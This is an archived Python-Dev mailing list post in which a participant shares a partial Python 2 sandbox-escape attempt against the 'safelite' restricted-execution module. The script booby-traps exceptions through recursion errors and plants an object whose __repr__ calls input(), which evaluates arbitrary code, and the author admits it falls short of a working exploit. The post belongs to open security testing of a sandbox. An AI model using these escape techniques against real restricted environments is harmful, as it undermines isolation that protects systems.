print ''' tav wrote: > Daniel emailed in the exploit below and it is pretty devastating. It > takes advantage of the fact that the warnings framework in 2.6+ > dynamically imports modules without being explicitly called!!
Here's one I couldn't develop to a working exploit, but think is promising. It highlights a real Python bug and an implementation detail. Targets 2.6 or trunk. It was how I stumbled upon the _warnings hack :) Should be copy-n-past'able, Daniel ''' # Hi from safelite import FileReader # First, it's possible to set a booby-trapped # Exception due to a Python bug # This is bait, say hi bait def bait(): ''' Hi! ''' try: return bait() except: return "Ready to go" # Set the trap bait() # Let FileReader trigger it -> RuntimeError in Namespace: FileReader('safelite.py') # ^- shoud give: # Traceback (most recent call last): # File "<stdin>", line 1, in <module> # File "safelite.py", line 242, in FileReader # self = Namespace() # File "safelite.py", line 165, in Namespace # for name, obj in sys.get_frame_locals(frame) \ # .iteritems(): # RuntimeError: maximum recursion depth exceeded # # Now, I think this might be a special RuntimeError... # Let's catch it! Bait, please? bait() try: FileReader('safelite.py') except Exception, caught: pass # Let's brand it caught.__init__("I'm back, the other side is scary!") # Now set it free and see if it comes back bait() try: FileReader('safelite.py') except Exception, caught_again: pass # Who's there? print caught_again # -> He's back! # So, hm, that's it... not so exciting but might help # traceback-based exploits. Did I mention little 'caught' # there can carry arbitrary payloads? Nice boy. # Another one # # Now, that we have a protection against _warnings, # an obvious bait-less new trap is available # Got a spare SystemError? FileReader('safelite.py', 'r', 1.1) # ^- shoud give: # Traceback (most recent call last): # File "<stdin>", line 1, in <module> # File "safelite.py", line 201, in FileReader # fileobj = open_file(filename, mode, buffering) # SystemError: Objects/moduleobject.c:50: bad argument \ # to internal function # Nice, but I want a cleaner one. Hey, caught, could you? print caught.message # ^- shoud give: # Traceback (most recent call last): # File "<stdin>", line 1, in <module> # SystemError: Objects/moduleobject.c:50: bad argument \ # to internal function # This seems to be a regular SystemError. It's not as # polite as our pet RuntimeError 'caught', which can # be silenced by intervening Exceptions. # As I should stop playing with this, here's # a plea for help: set 'caught' free before you go. # Here's the target: freedom class freedom(object): def __repr__(self): print list(sorted(globals()['__builtins__'].keys())) print '\n\n--------\n' return str(input('Type for freedom:\n >> ;) > ')) # Initiate caught on it caught.__init__(freedom()) # Set the bait... bait() # Now, type something clever :) FileReader('safelite.py') _______________________________________________ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com